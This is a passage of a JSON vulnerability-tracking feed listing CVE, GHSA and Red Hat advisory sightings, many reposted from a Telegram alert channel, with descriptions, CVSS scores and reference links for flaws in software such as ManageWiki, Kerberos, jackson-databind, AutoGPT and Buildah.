Description: ManageWiki is a MediaWiki extension allowing users to manage wikis. Versions before commit f504ed8, are vulnerable to SQL injection when renaming a namespace in Special:ManageWiki/namespaces when using a page prefix (namespace name, which is the current namespace you are renaming) with an injection payload. This issue has been patched in commit f504ed8. A workaround for this vulnerability involves setting `$wgManageWiki['namespaces'] = false;`.\n\ud83d\udccf Published: 2025-04-21T20:45:49.523Z\n\ud83d\udccf Modified: 2025-04-21T20:45:49.523Z\n\ud83d\udd17 References:\n1. https://github.com/miraheze/ManageWiki/security/advisories/GHSA-gg42-cv66-f5x7\n2. https://github.com/miraheze/ManageWiki/commit/f504ed8eeb59b57ebb90f93cd44f23da4c5bc4c9", "creation_timestamp": "2025-04-21T21:02:35.000000Z"}, {"uuid": "b9551917-acce-47cd-b477-1f6b0fffdce2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F75J-4CW6-RMX4", "type": "seen", "source": "https://t.me/poxek/6232", "content": "", "creation_timestamp": "2026-07-13T13:00:04.333103Z"}, {"uuid": "9e0a4c0a-5082-4ded-b9a0-bc45e43bc15f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8690", "type": "seen", "source": "Telegram/TWIFfksyEBRaPIfegQx7mJB8xPsFErQuFl3F3s90qTu9ejY", "content": "", "creation_timestamp": "2026-01-08T05:04:49.000000Z"}, {"uuid": "15dc3e80-fc79-41b3-b841-11558c25643c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCMH-QJQH-P98V", "type": "published-proof-of-concept", "source": "Telegram/9JxPHUAOQwhVGau30-V4r6BA5CngXRwaES-J22jn8FPVI6U", "content": "", "creation_timestamp": "2026-01-08T04:00:32.000000Z"}, {"uuid": "92615435-b854-48a2-9bdc-a4443f455ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-64MQ-FVFJ-5X3C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11686", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-42898\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has \"a similar bug.\"\n\ud83d\udccf Published: 2022-12-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-14T18:33:09.110Z\n\ud83d\udd17 References:\n1. https://web.mit.edu/kerberos/advisories/\n2. https://www.samba.org/samba/security/CVE-2022-42898.html\n3. https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583\n4. https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c\n5. https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt\n6. https://web.mit.edu/kerberos/krb5-1.19/\n7. https://bugzilla.samba.org/show_bug.cgi?id=15203\n8. https://security.netapp.com/advisory/ntap-20230216-0008/\n9. https://security.netapp.com/advisory/ntap-20230223-0001/\n10. https://security.gentoo.org/glsa/202309-06\n11. https://security.gentoo.org/glsa/202310-06", "creation_timestamp": "2025-04-14T18:54:20.000000Z"}, {"uuid": "1ad30c76-ebad-46be-bcbb-9346b69d4389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5QG5-G7C2-PFX8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11907", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32778\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project (Lissy93/web-check). The issue stems from user-controlled input (url) being passed unsanitized into a shell command using exec(), allowing attackers to execute arbitrary system commands on the underlying host. This could be exploited by sending crafted url parameters to extract files or even establish remote access. The vulnerability has been patched by replacing exec() with execFile(), which avoids using a shell and properly isolates arguments.\n\ud83d\udccf Published: 2025-04-15T20:19:58.458Z\n\ud83d\udccf Modified: 2025-04-15T20:31:34.236Z\n\ud83d\udd17 References:\n1. https://github.com/Lissy93/web-check/security/advisories/GHSA-5qg5-g7c2-pfx8\n2. https://github.com/Lissy93/web-check/pull/243\n3. https://github.com/Lissy93/web-check/commit/0e4958aa10b2650d32439a799f6fc83a7cd46cef", "creation_timestamp": "2025-04-15T20:55:08.000000Z"}, {"uuid": "28f2e1bd-0b6a-49a3-8a87-bde34ee3e6ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WWPF-3J4P-739W", "type": "published-proof-of-concept", "source": "Telegram/R7G5TH60IIrS17WeTIGuh4K12MZRBS8V0K5xfyCLmHDr_SE", "content": "", "creation_timestamp": "2026-01-08T03:00:34.000000Z"}, {"uuid": "be718197-b210-4057-b070-b7275cfd4e64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-949H-9824-XMCX", "type": "published-proof-of-concept", "source": "Telegram/TtjXsNK2JI7-6q-2dTs3Ev3VxXtuEcF5K_zir_JYhY6EW9Y", "content": "", "creation_timestamp": "2026-01-08T02:00:39.000000Z"}, {"uuid": "96e981f5-ad99-4a22-b532-defe38a301e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RPR3-CW39-3PXH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11647", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2020-10650\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider.\n\ud83d\udccf Published: 2022-12-26T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-14T16:22:00.404Z\n\ud83d\udd17 References:\n1. https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062\n2. https://www.oracle.com/security-alerts/cpujan2021.html\n3. https://github.com/advisories/GHSA-rpr3-cw39-3pxh\n4. https://www.oracle.com/security-alerts/cpuoct2022.html\n5. https://github.com/FasterXML/jackson-databind/issues/2658\n6. https://github.com/FasterXML/jackson-databind/commit/a424c038ba0c0d65e579e22001dec925902ac0ef\n7. https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html\n8. https://security.netapp.com/advisory/ntap-20230818-0007/", "creation_timestamp": "2025-04-14T16:53:43.000000Z"}, {"uuid": "8921150c-2ab9-409e-8149-36c5975b93a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8846", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "a8d022ff-25e1-4fdb-930a-8eb29d414307", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8675", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "497c1d24-033b-4166-a9b4-768e13dfeed4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PFH-R8X4-W26W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12055", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23537\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. Buffer overread is possible when parsing a specially crafted STUN message with unknown attribute. The vulnerability affects applications that uses STUN including PJNATH and PJSUA-LIB. The patch is available as a commit in the master branch (2.13.1).\n\ud83d\udccf Published: 2022-12-20T18:50:45.398Z\n\ud83d\udccf Modified: 2025-04-16T14:52:55.716Z\n\ud83d\udd17 References:\n1. https://github.com/pjsip/pjproject/security/advisories/GHSA-9pfh-r8x4-w26w\n2. https://github.com/pjsip/pjproject/commit/d8440f4d711a654b511f50f79c0445b26f9dd1e1\n3. https://lists.debian.org/debian-lts-announce/2023/08/msg00038.html", "creation_timestamp": "2025-04-16T14:56:23.000000Z"}, {"uuid": "cd260ce6-96e3-4309-a70b-d0361b4d9423", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3963", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "f746d8e5-0cfd-42d7-bdb3-a56618c4c229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WVJG-9879-3M7W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11735", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31490\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. Prior to 0.6.1, AutoGPT allows SSRF due to DNS Rebinding in requests wrapper. AutoGPT is built with a wrapper around Python's requests library, hardening the application against SSRF. The code for this wrapper can be found in autogpt_platform/backend/backend/util/request.py. The requested hostname of a URL which is being requested is validated, ensuring that it does not resolve to any local ipv4 or ipv6 addresses. However, this check is not sufficient, as a DNS server may initially respond with a non-blocked address, with a TTL of 0. This means that the initial resolution would appear as a non-blocked address. In this case, validate_url() will return the url as successful. After validate_url() has successfully returned the url, the url is then passed to the real request() function. When the real request() function is called with the validated url, request() will once again resolve the address of the hostname, because the record will not have been cached (due to TTL 0). This resolution may be in the \"invalid range\". This type of attack is called a \"DNS Rebinding Attack\". This vulnerability is fixed in 0.6.1.\n\ud83d\udccf Published: 2025-04-14T23:07:25.840Z\n\ud83d\udccf Modified: 2025-04-14T23:15:32.637Z\n\ud83d\udd17 References:\n1. https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-wvjg-9879-3m7w\n2. https://github.com/Significant-Gravitas/AutoGPT/commit/66ebe4376eab3434af90808796b54c2139847b37", "creation_timestamp": "2025-04-14T23:53:50.000000Z"}, {"uuid": "4917524c-30df-498e-bc01-a0adda6b9f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MV3-WM7J-H4W5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11750", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46171\n\ud83d\udd25 CVSS Score: 6.8 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: Tauri is a framework for building binaries for all major desktop platforms. The filesystem glob pattern wildcards `*`, `?`, and `[...]` match file path literals and leading dots by default, which unintentionally exposes sub folder content of allowed paths. Scopes without the wildcards are not affected. As `**` allows for sub directories the behavior there is also as expected. The issue has been patched in the latest release and was backported into the currently supported 1.x branches. There are no known workarounds at the time of publication.\n\ud83d\udccf Published: 2022-12-23T13:47:56.494Z\n\ud83d\udccf Modified: 2025-04-15T03:17:21.623Z\n\ud83d\udd17 References:\n1. https://github.com/tauri-apps/tauri/security/advisories/GHSA-6mv3-wm7j-h4w5\n2. https://github.com/tauri-apps/tauri/commit/72389b00d7b495ffd7750eb1e75a3b8537d07cf3\n3. https://github.com/tauri-apps/tauri/commit/f0602e7c294245ab6ef6fbf2a976ef398340ef58", "creation_timestamp": "2025-04-15T03:54:31.000000Z"}, {"uuid": "566bf0af-44b8-47f6-b54e-9fc8ac4196d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PFH-R8X4-W26W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11751", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23547\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. This issue is similar to GHSA-9pfh-r8x4-w26w. Possible buffer overread when parsing a certain STUN message. The vulnerability affects applications that uses STUN including PJNATH and PJSUA-LIB. The patch is available as commit in the master branch.\n\ud83d\udccf Published: 2022-12-23T14:00:22.817Z\n\ud83d\udccf Modified: 2025-04-15T03:12:28.456Z\n\ud83d\udd17 References:\n1. https://github.com/pjsip/pjproject/security/advisories/GHSA-cxwq-5g9x-x7fr\n2. https://github.com/pjsip/pjproject/security/advisories/GHSA-9pfh-r8x4-w26w\n3. https://github.com/pjsip/pjproject/commit/bc4812d31a67d5e2f973fbfaf950d6118226cf36\n4. https://lists.debian.org/debian-lts-announce/2023/08/msg00038.html", "creation_timestamp": "2025-04-15T03:54:32.000000Z"}, {"uuid": "98c1e519-8419-4143-929b-490aaf33303e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CXWQ-5G9X-X7FR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11751", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23547\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. This issue is similar to GHSA-9pfh-r8x4-w26w. Possible buffer overread when parsing a certain STUN message. The vulnerability affects applications that uses STUN including PJNATH and PJSUA-LIB. The patch is available as commit in the master branch.\n\ud83d\udccf Published: 2022-12-23T14:00:22.817Z\n\ud83d\udccf Modified: 2025-04-15T03:12:28.456Z\n\ud83d\udd17 References:\n1. https://github.com/pjsip/pjproject/security/advisories/GHSA-cxwq-5g9x-x7fr\n2. https://github.com/pjsip/pjproject/security/advisories/GHSA-9pfh-r8x4-w26w\n3. https://github.com/pjsip/pjproject/commit/bc4812d31a67d5e2f973fbfaf950d6118226cf36\n4. https://lists.debian.org/debian-lts-announce/2023/08/msg00038.html", "creation_timestamp": "2025-04-15T03:54:32.000000Z"}, {"uuid": "ca1e67c0-6d42-4214-a1be-ac0ff28a6bc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:6583", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11782", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-3640\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A possible unauthorized memory access flaw was found in the Linux kernel's cpu_entry_area mapping of X86 CPU data to memory, where a user may guess the location of exception stacks or other important data. Based on the previous CVE-2023-0597, the 'Randomize per-cpu entry area' feature was implemented in /arch/x86/mm/cpu_entry_area.c, which works through the init_cea_offsets() function when KASLR is enabled. However, despite this feature, there is still a risk of per-cpu entry area leaks. This issue could allow a local user to gain access to some important data with memory in an expected location and potentially escalate their privileges on the system.\n\ud83d\udccf Published: 2023-07-24T15:19:29.983Z\n\ud83d\udccf Modified: 2025-04-15T11:40:03.124Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:6583\n2. https://access.redhat.com/security/cve/CVE-2023-3640\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2217523", "creation_timestamp": "2025-04-15T11:55:55.000000Z"}, {"uuid": "70525884-e023-41c9-9c24-826b0efb5ca7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4035", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "19d86d87-91c8-4dca-95ee-223026f22247", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1387", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "b38f430e-ea23-4116-a185-b3b7f1adbc4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1388", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "794ea7a4-045b-4688-8f1a-ddb2f828c59a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1385", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: 